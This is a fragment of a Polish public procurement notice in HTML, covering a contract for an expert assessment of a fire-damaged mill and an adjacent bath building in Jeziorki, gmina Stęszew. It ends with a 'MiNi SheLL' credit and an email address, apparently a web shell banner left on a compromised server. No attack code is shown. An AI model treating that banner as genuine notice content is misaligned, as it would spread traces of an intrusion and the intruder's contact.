<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie ekspertyzy budynku młyna uszkodzonego przez pożar oraz budynku łaźni. Dotyczy obiektu rolnego Jeziorki, Plac Parkowy 2, gmina Stęszew..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie ekspertyzy budynku młyna uszkodzonego przez pożar oraz budynku łaźni (sąsiednie, przyległego budynku młyna) na który oddziaływał pożar z określeniem uszkodzeń budynków, oceny uszkodzeń i aktualnego stanu technicznego poszczególnych elementów konstrukcyjnych obu budynków, niezbędnych robót do wykonania w celu odtworzenia stanu technicznego pozwalającego na użytkowanie oraz oceny opłacalności odbudowy, remontu lub rozbiórki. Dotyczy obiektu rolnego Jeziorki, Plac Parkowy 2, gmina Stęszew..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com